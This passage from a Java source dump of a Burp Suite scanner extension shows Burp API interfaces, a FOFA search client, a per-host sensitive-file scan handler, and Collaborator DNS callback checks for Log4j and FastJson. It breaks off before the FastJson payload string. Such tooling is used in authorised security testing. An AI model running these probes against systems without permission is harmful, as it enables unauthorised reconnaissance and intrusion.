/src/main/java/BrianW/AKA/BigChan/Tools/DomainTool.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import java.net.MalformedURLException; 4 | import java.net.URL; 5 | import java.util.Arrays; 6 | import java.util.HashSet; 7 | import java.util.Set; 8 | import java.util.regex.Pattern; 9 | 10 | public class DomainTool { 11 | 12 | private final static Set PublicSuffixSet = new HashSet( 13 | Arrays.asList(new String( 14 | "com|org|net|gov|edu|co|tv|mobi|info|asia|xxx|onion|cn|com.cn|edu.cn|gov.cn|net.cn|org.cn|jp|kr|tw|com.hk|hk|com.hk|org.hk|se|com.se|org.se") 15 | .split("\\|"))); 16 | 17 | private static Pattern IP_PATTERN = Pattern.compile("(\\d{1,3}\\.){3}(\\d{1,3})"); 18 | 19 | /** 20 | * 获取url的顶级域名 21 | * @param url 22 | * @return 23 | */ 24 | public static String getDomainName(URL url) { 25 | String host = url.getHost(); 26 | if (host.endsWith(".")){ 27 | host = host.substring(0, host.length() - 1); 28 | } 29 | if (IP_PATTERN.matcher(host).matches()){ 30 | return host; 31 | } 32 | 33 | int index = 0; 34 | String candidate = host; 35 | for (; index >= 0;) { 36 | index = candidate.indexOf('.'); 37 | String subCandidate = candidate.substring(index + 1); 38 | if (PublicSuffixSet.contains(subCandidate)) { 39 | return candidate; 40 | } 41 | candidate = subCandidate; 42 | } 43 | return candidate; 44 | } 45 | 46 | /** 47 | * 获取url的顶级域名 48 | * @param url 49 | * @return 50 | * @throws MalformedURLException 51 | */ 52 | public static String getDomainName(String url) throws MalformedURLException { 53 | return getDomainName(new URL(url)); 54 | } 55 | 56 | /** 57 | * 判断两个url顶级域名是否相等 58 | * @param url1 59 | * @param url2 60 | * @return 61 | */ 62 | public static boolean isSameDomainName(URL url1, URL url2) { 63 | return getDomainName(url1).equalsIgnoreCase(getDomainName(url2)); 64 | } 65 | 66 | /** 67 | * 判断两个url顶级域名是否相等 68 | * @param url1 69 | * @param url2 70 | * @return 71 | * @throws MalformedURLException 72 | */ 73 | public static boolean isSameDomainName(String url1, String url2) 74 | throws MalformedURLException { 75 | return isSameDomainName(new URL(url1), new URL(url2)); 76 | } 77 | } -------------------------------------------------------------------------------- /src/main/java/burp/IResponseInfo.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IResponseInfo.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used to retrieve key details about an HTTP response. 16 | * Extensions can obtain an 17 | * IResponseInfo object for a given response by calling 18 | * IExtensionHelpers.analyzeResponse(). 19 | */ 20 | public interface IResponseInfo 21 | { 22 | /** 23 | * This method is used to obtain the HTTP headers contained in the response. 24 | * 25 | * @return The HTTP headers contained in the response. 26 | */ 27 | List getHeaders(); 28 | 29 | /** 30 | * This method is used to obtain the offset within the response where the 31 | * message body begins. 32 | * 33 | * @return The offset within the response where the message body begins. 34 | */ 35 | int getBodyOffset(); 36 | 37 | /** 38 | * This method is used to obtain the HTTP status code contained in the 39 | * response. 40 | * 41 | * @return The HTTP status code contained in the response. 42 | */ 43 | short getStatusCode(); 44 | 45 | /** 46 | * This method is used to obtain details of the HTTP cookies set in the 47 | * response. 48 | * 49 | * @return A list of ICookie objects representing the cookies 50 | * set in the response, if any. 51 | */ 52 | List getCookies(); 53 | 54 | /** 55 | * This method is used to obtain the MIME type of the response, as stated in 56 | * the HTTP headers. 57 | * 58 | * @return A textual label for the stated MIME type, or an empty String if 59 | * this is not known or recognized. The possible labels are the same as 60 | * those used in the main Burp UI. 61 | */ 62 | String getStatedMimeType(); 63 | 64 | /** 65 | * This method is used to obtain the MIME type of the response, as inferred 66 | * from the contents of the HTTP message body. 67 | * 68 | * @return A textual label for the inferred MIME type, or an empty String if 69 | * this is not known or recognized. The possible labels are the same as 70 | * those used in the main Burp UI. 71 | */ 72 | String getInferredMimeType(); 73 | } 74 | -------------------------------------------------------------------------------- /src/main/java/burp/IResponseVariations.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IResponseVariations.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used to represent variations between a number HTTP 16 | * responses, according to various attributes. 17 | */ 18 | public interface IResponseVariations 19 | { 20 | 21 | /** 22 | * This method is used to obtain the list of attributes that vary between 23 | * the analyzed responses. 24 | * 25 | * @return The attributes that vary between the analyzed responses. 26 | */ 27 | List getVariantAttributes(); 28 | 29 | /** 30 | * This method is used to obtain the list of attributes that do not vary 31 | * between the analyzed responses. 32 | * 33 | * @return The attributes that do not vary between the analyzed responses. 34 | */ 35 | List getInvariantAttributes(); 36 | 37 | /** 38 | * This method is used to obtain the value of an individual attribute in a 39 | * response. Note that the values of some attributes are intrinsically 40 | * meaningful (e.g. a word count) while the values of others are less so 41 | * (e.g. a checksum of the HTML tag names). 42 | * 43 | * @param attributeName The name of the attribute whose value will be 44 | * retrieved. Extension authors can obtain the list of supported attributes 45 | * by generating an IResponseVariations object for a single 46 | * response and calling 47 | * IResponseVariations.getInvariantAttributes(). 48 | * @param responseIndex The index of the response. Note that responses are 49 | * indexed from zero in the order they were originally supplied to the 50 | * IExtensionHelpers.analyzeResponseVariations() and 51 | * IResponseVariations.updateWith() methods. 52 | * @return The value of the specified attribute for the specified response. 53 | */ 54 | int getAttributeValue(String attributeName, int responseIndex); 55 | 56 | /** 57 | * This method is used to update the analysis based on additional responses. 58 | * 59 | * @param responses The new responses to include in the analysis. 60 | */ 61 | void updateWith(byte[]... responses); 62 | } 63 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/util/Base64Utils.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.util; 17 | import java.nio.charset.StandardCharsets; 18 | import java.util.Base64; 19 | import java.io.UnsupportedEncodingException; 20 | 21 | /** 22 | * Title: Base64Utils 23 | * Descrption: TODO 24 | * Date:2019-06-08 17:52 25 | * Email:woo0nise@gmail.com 26 | * Company:www.j2ee.app 27 | * 28 | * @author R4v3zn 29 | * @version 1.0.0 30 | */ 31 | public class Base64Utils { 32 | 33 | private Base64Utils(){} 34 | 35 | /** 36 | * encode 37 | * @param str need encode str 38 | * @return encode result 39 | */ 40 | public static String encode(String str){ 41 | byte[] b = null; 42 | String s = null; 43 | b = str.getBytes(StandardCharsets.UTF_8); 44 | if (b != null) { 45 | // new BASE64Encoder().encode(b); 46 | Base64.Encoder encoder = Base64.getEncoder(); 47 | s = encoder.encodeToString(b); 48 | } 49 | return s; 50 | } 51 | 52 | /** 53 | * decode 54 | * @param str need decode str 55 | * @return decode result 56 | */ 57 | public static String decode(String str){ 58 | byte[] b = null; 59 | String result = null; 60 | if (str != null && str != "") { 61 | Base64.Decoder decoder = Base64.getDecoder(); 62 | try { 63 | b = decoder.decode(str); 64 | result = new String(b, StandardCharsets.UTF_8); 65 | } catch (Exception e) { 66 | e.printStackTrace(); 67 | } 68 | } 69 | return result; 70 | } 71 | 72 | /** 73 | * Test 74 | * @param args 75 | */ 76 | public static void main(String[] args) { 77 | String encodeStr = encode("app=\"Solr\""); 78 | System.out.println(encodeStr); 79 | System.out.println(decode(encodeStr)); 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /src/main/java/burp/IMessageEditor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide extensions with an instance of Burp's HTTP 16 | * message editor, for the extension to use in its own UI. Extensions should 17 | * call IBurpExtenderCallbacks.createMessageEditor() to obtain an 18 | * instance of this interface. 19 | */ 20 | public interface IMessageEditor 21 | { 22 | 23 | /** 24 | * This method returns the UI component of the editor, for extensions to add 25 | * to their own UI. 26 | * 27 | * @return The UI component of the editor. 28 | */ 29 | Component getComponent(); 30 | 31 | /** 32 | * This method is used to display an HTTP message in the editor. 33 | * 34 | * @param message The HTTP message to be displayed. 35 | * @param isRequest Flags whether the message is an HTTP request or 36 | * response. 37 | */ 38 | void setMessage(byte[] message, boolean isRequest); 39 | 40 | /** 41 | * This method is used to retrieve the currently displayed message, which 42 | * may have been modified by the user. 43 | * 44 | * @return The currently displayed HTTP message. 45 | */ 46 | byte[] getMessage(); 47 | 48 | /** 49 | * This method is used to determine whether the current message has been 50 | * modified by the user. 51 | * 52 | * @return An indication of whether the current message has been modified by 53 | * the user since it was first displayed. 54 | */ 55 | boolean isMessageModified(); 56 | 57 | /** 58 | * This method returns the data that is currently selected by the user. 59 | * 60 | * @return The data that is currently selected by the user, or 61 | * null if no selection is made. 62 | */ 63 | byte[] getSelectedData(); 64 | 65 | /** 66 | * This method can be used to retrieve the bounds of the user's selection 67 | * into the displayed message, if applicable. 68 | * 69 | * @return An int[2] array containing the start and end offsets of the 70 | * user's selection within the displayed message. If the user has not made 71 | * any selection in the current message, both offsets indicate the position 72 | * of the caret within the editor. For some editor views, the concept of 73 | * selection within the message does not apply, in which case this method 74 | * returns null. 75 | */ 76 | int[] getSelectionBounds(); 77 | } 78 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Handlers/PerHostHandler.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Handlers; 2 | import BrianW.AKA.BigChan.PowerScanner.GetFofaInfo; 3 | import BrianW.AKA.BigChan.PowerScanner.ScanSensitiveFiles; 4 | import BrianW.AKA.BigChan.Tools.Global; 5 | import burp.*; 6 | 7 | import java.util.ArrayList; 8 | import java.util.List; 9 | 10 | public class PerHostHandler implements IScannerCheck { 11 | private final IBurpExtenderCallbacks callbacks; 12 | private final IExtensionHelpers helpers; 13 | private final List scanedHosts; 14 | 15 | public PerHostHandler(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 16 | this.callbacks = callbacks; 17 | this.helpers = helpers; 18 | this.scanedHosts = new ArrayList();; 19 | } 20 | 21 | @Override 22 | public List doPassiveScan(IHttpRequestResponse baseRequestResponse) { 23 | return null; 24 | } 25 | 26 | @Override 27 | public List doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 28 | // report the issue 29 | List issues = new ArrayList<>(); 30 | String currentHost = baseRequestResponse.getHttpService().getHost(); 31 | if (this.scanedHosts.contains(currentHost)){ 32 | return issues; 33 | } 34 | this.callbacks.printOutput("do ActiveScan per host on: " + currentHost); 35 | scanedHosts.add(currentHost); 36 | if (Global.config.getConfigSensitiveFilesScanEnable_value()){ 37 | issues.addAll( 38 | new ScanSensitiveFiles(callbacks, helpers).doScanSensiveFiles(baseRequestResponse, insertionPoint) 39 | ); 40 | } 41 | issues.addAll( 42 | new GetFofaInfo(callbacks, helpers).doGetFofaInfo_Icon(baseRequestResponse, insertionPoint) 43 | ); 44 | issues.addAll( 45 | new GetFofaInfo(callbacks, helpers).doGetFofaInfo_Title(baseRequestResponse, insertionPoint) 46 | ); 47 | issues.addAll( 48 | new GetFofaInfo(callbacks, helpers).doGetFofaInfo_Domain(baseRequestResponse, insertionPoint) 49 | ); 50 | List nullList = new ArrayList(); 51 | nullList.add(null); 52 | issues.removeAll(nullList); 53 | return issues; 54 | } 55 | 56 | @Override 57 | public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIssue) { 58 | return 0; 59 | } 60 | 61 | // helper method to search a response for occurrences of a literal match string 62 | // and return a list of start/end offsets 63 | private List getMatches(byte[] response, byte[] match) { 64 | List matches = new ArrayList(); 65 | 66 | int start = 0; 67 | while (start < response.length) { 68 | start = helpers.indexOf(response, match, true, start, response.length); 69 | if (start == -1) { 70 | break; 71 | } 72 | matches.add(new int[]{start, start + match.length}); 73 | start += match.length; 74 | } 75 | 76 | return matches; 77 | } 78 | } -------------------------------------------------------------------------------- /src/main/java/burp/IScanQueueItem.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScanQueueItem.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve details of items in the Burp Scanner 14 | * active scan queue. Extensions can obtain references to scan queue items by 15 | * calling 16 | * IBurpExtenderCallbacks.doActiveScan(). 17 | */ 18 | public interface IScanQueueItem 19 | { 20 | /** 21 | * This method returns a description of the status of the scan queue item. 22 | * 23 | * @return A description of the status of the scan queue item. 24 | */ 25 | String getStatus(); 26 | 27 | /** 28 | * This method returns an indication of the percentage completed for the 29 | * scan queue item. 30 | * 31 | * @return An indication of the percentage completed for the scan queue 32 | * item. 33 | */ 34 | @Deprecated 35 | byte getPercentageComplete(); 36 | 37 | /** 38 | * This method returns the number of requests that have been made for the 39 | * scan queue item. 40 | * 41 | * @return The number of requests that have been made for the scan queue 42 | * item. 43 | */ 44 | int getNumRequests(); 45 | 46 | /** 47 | * This method returns the number of network errors that have occurred for 48 | * the scan queue item. 49 | * 50 | * @return The number of network errors that have occurred for the scan 51 | * queue item. 52 | */ 53 | int getNumErrors(); 54 | 55 | /** 56 | * This method returns the number of attack insertion points being used for 57 | * the scan queue item. 58 | * 59 | * @return The number of attack insertion points being used for the scan 60 | * queue item. 61 | */ 62 | int getNumInsertionPoints(); 63 | 64 | /** 65 | * This method allows the scan queue item to be canceled. 66 | */ 67 | void cancel(); 68 | 69 | /** 70 | * This method returns details of the issues generated for the scan queue 71 | * item. Note: different items within the scan queue may contain 72 | * duplicated versions of the same issues - for example, if the same request 73 | * has been scanned multiple times. Duplicated issues are consolidated in 74 | * the main view of scan results. Extensions can register an 75 | * IScannerListener to get details only of unique, newly 76 | * discovered Scanner issues post-consolidation. 77 | * 78 | * @return Details of the issues generated for the scan queue item. 79 | */ 80 | IScanIssue[] getIssues(); 81 | } 82 | -------------------------------------------------------------------------------- /src/main/java/burp/IRequestInfo.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IRequestInfo.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.net.URL; 13 | import java.util.List; 14 | 15 | /** 16 | * This interface is used to retrieve key details about an HTTP request. 17 | * Extensions can obtain an 18 | * IRequestInfo object for a given request by calling 19 | * IExtensionHelpers.analyzeRequest(). 20 | */ 21 | public interface IRequestInfo 22 | { 23 | /** 24 | * Used to indicate that there is no content. 25 | */ 26 | byte CONTENT_TYPE_NONE = 0; 27 | /** 28 | * Used to indicate URL-encoded content. 29 | */ 30 | byte CONTENT_TYPE_URL_ENCODED = 1; 31 | /** 32 | * Used to indicate multi-part content. 33 | */ 34 | byte CONTENT_TYPE_MULTIPART = 2; 35 | /** 36 | * Used to indicate XML content. 37 | */ 38 | byte CONTENT_TYPE_XML = 3; 39 | /** 40 | * Used to indicate JSON content. 41 | */ 42 | byte CONTENT_TYPE_JSON = 4; 43 | /** 44 | * Used to indicate AMF content. 45 | */ 46 | byte CONTENT_TYPE_AMF = 5; 47 | /** 48 | * Used to indicate unknown content. 49 | */ 50 | byte CONTENT_TYPE_UNKNOWN = -1; 51 | 52 | /** 53 | * This method is used to obtain the HTTP method used in the request. 54 | * 55 | * @return The HTTP method used in the request. 56 | */ 57 | String getMethod(); 58 | 59 | /** 60 | * This method is used to obtain the URL in the request. 61 | * 62 | * @return The URL in the request. 63 | */ 64 | URL getUrl(); 65 | 66 | /** 67 | * This method is used to obtain the HTTP headers contained in the request. 68 | * 69 | * @return The HTTP headers contained in the request. 70 | */ 71 | List getHeaders(); 72 | 73 | /** 74 | * This method is used to obtain the parameters contained in the request. 75 | * 76 | * @return The parameters contained in the request. 77 | */ 78 | List getParameters(); 79 | 80 | /** 81 | * This method is used to obtain the offset within the request where the 82 | * message body begins. 83 | * 84 | * @return The offset within the request where the message body begins. 85 | */ 86 | int getBodyOffset(); 87 | 88 | /** 89 | * This method is used to obtain the content type of the message body. 90 | * 91 | * @return An indication of the content type of the message body. Available 92 | * types are defined within this interface. 93 | */ 94 | byte getContentType(); 95 | } 96 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/FetchCollaboratorWithSig.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import burp.*; 4 | 5 | import java.nio.charset.StandardCharsets; 6 | import java.util.List; 7 | 8 | public class FetchCollaboratorWithSig { 9 | protected CustomScanIssue issue; 10 | protected String collaboratorPayload; 11 | protected String sig; 12 | protected IBurpExtenderCallbacks callbacks; 13 | protected IExtensionHelpers helpers; 14 | IBurpCollaboratorClientContext collaboratorContext; 15 | 16 | public FetchCollaboratorWithSig(CustomScanIssue issue, String collaboratorPayload, String sig, IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers, IBurpCollaboratorClientContext collaboratorContext) { 17 | this.issue = issue; 18 | this.collaboratorPayload = collaboratorPayload; 19 | this.sig = sig; 20 | this.callbacks = callbacks; 21 | this.helpers = helpers; 22 | this.collaboratorContext = collaboratorContext; 23 | } 24 | 25 | public void start(){ 26 | Global.fixedThreadPool.execute(this::fetch); 27 | } 28 | 29 | private void fetch() { 30 | try { 31 | Thread.sleep(Global.config.fetchCollaboratorWaitSecond * 1000); 32 | } catch (InterruptedException e) { 33 | this.callbacks.printError(String.format("Error in doScanLog4j while sleep: %s", Utils.getStackMsg(e))); 34 | return; 35 | } 36 | this.callbacks.printOutput(String.format("Fetch collaborator: %s; ", this.collaboratorPayload)); 37 | List interactions = this.collaboratorContext.fetchCollaboratorInteractionsFor(this.collaboratorPayload); 38 | if (interactions.size() > 0) { 39 | // this.callbacks.printOutput(String.format("Found collaborator that match payload: %s", this.collaboratorPayload)); 40 | for (IBurpCollaboratorInteraction interaction : interactions) { 41 | // this.callbacks.printOutput("checking collaborator: " + this.collaboratorPayload); 42 | if (interaction.getProperty("type").equalsIgnoreCase("dns") ){ 43 | try{ 44 | List records = Utils.extractDnsData(Utils.Base64Decode(interaction.getProperty("raw_query").getBytes(StandardCharsets.UTF_8))).Records; 45 | // this.callbacks.printOutput(String.format("%s has records: %s", this.collaboratorPayload, records)); 46 | if (records.contains(this.sig)){ 47 | this.callbacks.addScanIssue(this.issue); 48 | break; 49 | } 50 | }catch(Exception e){ 51 | this.callbacks.printError(String.format("Error in FetchCollaboratorWithSig: %s", Utils.getStackMsg(e))); 52 | } 53 | } 54 | } 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/DO/FofaData.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.DO; 17 | 18 | import java.util.List; 19 | 20 | /** 21 | * Title: FofaData 22 | * Descrption: this is fofa datas 23 | * Date:2019-06-08 17:49 24 | * Email:woo0nise@gmail.com 25 | * Company:www.j2ee.app 26 | * 27 | * @author R4v3zn 28 | * @version 1.0.0 29 | */ 30 | public class FofaData { 31 | 32 | /** 33 | * mode 34 | */ 35 | private String mode; 36 | 37 | /** 38 | * current page no 39 | */ 40 | private Integer page; 41 | 42 | /** 43 | * total size 44 | */ 45 | private Integer size; 46 | 47 | /** 48 | * total page 49 | */ 50 | private Integer totalPage; 51 | 52 | /** 53 | * query 54 | */ 55 | private String query; 56 | 57 | /** 58 | * results 59 | */ 60 | private List> results; 61 | 62 | public void setQuery(String query) { 63 | this.query = query; 64 | } 65 | 66 | public String getQuery() { 67 | return query; 68 | } 69 | 70 | public void setTotalPage(Integer totalPage) { 71 | this.totalPage = totalPage; 72 | } 73 | 74 | public Integer getTotalPage() { 75 | return totalPage; 76 | } 77 | 78 | public String getMode() { 79 | return mode; 80 | } 81 | 82 | public Integer getPage() { 83 | return page; 84 | } 85 | 86 | public Integer getSize() { 87 | return size; 88 | } 89 | 90 | public List> getResults() { 91 | return results; 92 | } 93 | 94 | public void setResults(List> results) { 95 | this.results = results; 96 | } 97 | 98 | public void setMode(String mode) { 99 | this.mode = mode; 100 | } 101 | 102 | public void setPage(Integer page) { 103 | this.page = page; 104 | } 105 | 106 | public void setSize(Integer size) { 107 | this.size = size; 108 | } 109 | 110 | @Override 111 | public String toString() { 112 | return "FofaData{" + 113 | "mode='" + mode + '\'' + 114 | ", page=" + page + 115 | ", size=" + size + 116 | ", totalPage=" + totalPage + 117 | ", query='" + query + '\'' + 118 | ", results=" + results + 119 | '}'; 120 | } 121 | } 122 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/util/HttpUtils.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.util; 17 | 18 | import java.io.BufferedReader; 19 | import java.io.IOException; 20 | import java.io.InputStreamReader; 21 | import java.net.*; 22 | import java.util.HashMap; 23 | import java.util.Map; 24 | 25 | /** 26 | * Title: HttpUtils 27 | * Descrption: HttpUtils 28 | * Date:2019-06-10 19:10 29 | * Email:woo0nise@gmail.com 30 | * Company:www.j2ee.app 31 | * @author R4v3zn 32 | * @version 1.0.0 33 | */ 34 | public class HttpUtils { 35 | /** 36 | * private 37 | */ 38 | private HttpUtils(){} 39 | 40 | /** 41 | * do get 42 | * @param url requests url 43 | * @return response info 44 | */ 45 | public static String doGet(String url){ 46 | return doGet(url,null); 47 | } 48 | 49 | /** 50 | * do get 51 | * @param actionUrl requests url 52 | * @param map requests param 53 | * @return response info 54 | */ 55 | public static String doGet(String actionUrl,Map map) { 56 | String result = ""; 57 | try { 58 | if(map != null && map.size() > 0){ 59 | actionUrl += "?"; 60 | 61 | for (String key: map.keySet()) { 62 | actionUrl += key + "="+URLEncoder.encode(map.get(key).toString(), "UTF-8")+"&"; 63 | } 64 | } 65 | URL url = new URL(actionUrl); 66 | HttpURLConnection connection = (HttpURLConnection) url.openConnection(); 67 | connection.setRequestMethod("GET"); 68 | BufferedReader reader = null; 69 | if(HttpURLConnection.HTTP_OK == connection.getResponseCode()){ 70 | reader = new BufferedReader(new InputStreamReader(connection.getInputStream(), "utf-8")); 71 | }else{ 72 | reader = new BufferedReader(new InputStreamReader(connection.getErrorStream(), "utf-8")); 73 | } 74 | String s = ""; 75 | String temp = ""; 76 | while ((temp = reader.readLine()) != null) { 77 | s += temp; 78 | } 79 | result = s; 80 | reader.close(); 81 | } catch (ProtocolException e) { 82 | e.printStackTrace(); 83 | } catch (MalformedURLException e) { 84 | e.printStackTrace(); 85 | } catch (IOException e) { 86 | e.printStackTrace(); 87 | } 88 | return result; 89 | } 90 | } 91 | -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | brian.powerscanner 8 | scanner 9 | 1.1.3-SNAPSHOT 10 | 11 | 12 | 11 13 | 11 14 | 15 | 16 | 17 | 18 | org.apache.maven.plugins 19 | maven-compiler-plugin 20 | 21 | 11 22 | 11 23 | 24 | 25 | 26 | org.apache.maven.plugins 27 | maven-assembly-plugin 28 | 29 | 30 | jar-with-dependencies 31 | 32 | 33 | 34 | burp.BurpExtender 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | org.ini4j 45 | ini4j 46 | 0.5.4 47 | compile 48 | 49 | 50 | com.google.code.gson 51 | gson 52 | 2.8.9 53 | 54 | 55 | com.google.guava 56 | guava 57 | 31.0.1-jre 58 | 59 | 60 | 61 | org.jsoup 62 | jsoup 63 | 1.14.3 64 | 65 | 66 | com.fasterxml.jackson.core 67 | jackson-databind 68 | 2.13.0 69 | 70 | 71 | 72 | org.apache.httpcomponents 73 | httpclient 74 | 4.5.13 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /src/main/java/burp/ITextEditor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITextEditor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide extensions with an instance of Burp's raw 16 | * text editor, for the extension to use in its own UI. Extensions should call 17 | * IBurpExtenderCallbacks.createTextEditor() to obtain an instance 18 | * of this interface. 19 | */ 20 | public interface ITextEditor 21 | { 22 | /** 23 | * This method returns the UI component of the editor, for extensions to add 24 | * to their own UI. 25 | * 26 | * @return The UI component of the editor. 27 | */ 28 | Component getComponent(); 29 | 30 | /** 31 | * This method is used to control whether the editor is currently editable. 32 | * This status can be toggled on and off as required. 33 | * 34 | * @param editable Indicates whether the editor should be currently 35 | * editable. 36 | */ 37 | void setEditable(boolean editable); 38 | 39 | /** 40 | * This method is used to update the currently displayed text in the editor. 41 | * 42 | * @param text The text to be displayed. 43 | */ 44 | void setText(byte[] text); 45 | 46 | /** 47 | * This method is used to retrieve the currently displayed text. 48 | * 49 | * @return The currently displayed text. 50 | */ 51 | byte[] getText(); 52 | 53 | /** 54 | * This method is used to determine whether the user has modified the 55 | * contents of the editor. 56 | * 57 | * @return An indication of whether the user has modified the contents of 58 | * the editor since the last call to 59 | * setText(). 60 | */ 61 | boolean isTextModified(); 62 | 63 | /** 64 | * This method is used to obtain the currently selected text. 65 | * 66 | * @return The currently selected text, or 67 | * null if the user has not made any selection. 68 | */ 69 | byte[] getSelectedText(); 70 | 71 | /** 72 | * This method can be used to retrieve the bounds of the user's selection 73 | * into the displayed text, if applicable. 74 | * 75 | * @return An int[2] array containing the start and end offsets of the 76 | * user's selection within the displayed text. If the user has not made any 77 | * selection in the current message, both offsets indicate the position of 78 | * the caret within the editor. 79 | */ 80 | int[] getSelectionBounds(); 81 | 82 | /** 83 | * This method is used to update the search expression that is shown in the 84 | * search bar below the editor. The editor will automatically highlight any 85 | * regions of the displayed text that match the search expression. 86 | * 87 | * @param expression The search expression. 88 | */ 89 | void setSearchExpression(String expression); 90 | } 91 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanFastJson.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.*; 4 | import burp.*; 5 | 6 | import static java.lang.Thread.sleep; 7 | 8 | public class ScanFastJson extends Reporter { 9 | protected IBurpExtenderCallbacks callbacks; 10 | protected IExtensionHelpers helpers; 11 | 12 | public ScanFastJson(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 13 | super(callbacks, helpers); 14 | this.callbacks = callbacks; 15 | this.helpers = helpers; 16 | } 17 | 18 | public IScanIssue doScanFastJson(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 19 | byte[] resp = baseRequestResponse.getResponse(); 20 | byte[] req = baseRequestResponse.getRequest(); 21 | String baseName = insertionPoint.getInsertionPointName(); 22 | byte insertionPointType = insertionPoint.getInsertionPointType(); 23 | String baseValue = insertionPoint.getBaseValue(); 24 | //如果参数类型是entire body 25 | if (insertionPointType == 36) { 26 | // callbacks.printOutput("param: " + baseName + " ,type: " + insertionPointType + " ,value: " + baseValue); 27 | if (Utils.isJson(baseValue)){ 28 | IBurpCollaboratorClientContext collaboratorContext = this.callbacks.createBurpCollaboratorClientContext(); 29 | String collaboratorPayload = collaboratorContext.generatePayload(true); 30 | callbacks.printOutput("generate Fastjson collaboratorPayload: " + collaboratorPayload); 31 | String sig = Utils.getRandomString(3).toLowerCase(); 32 | String payload = String.format("{ 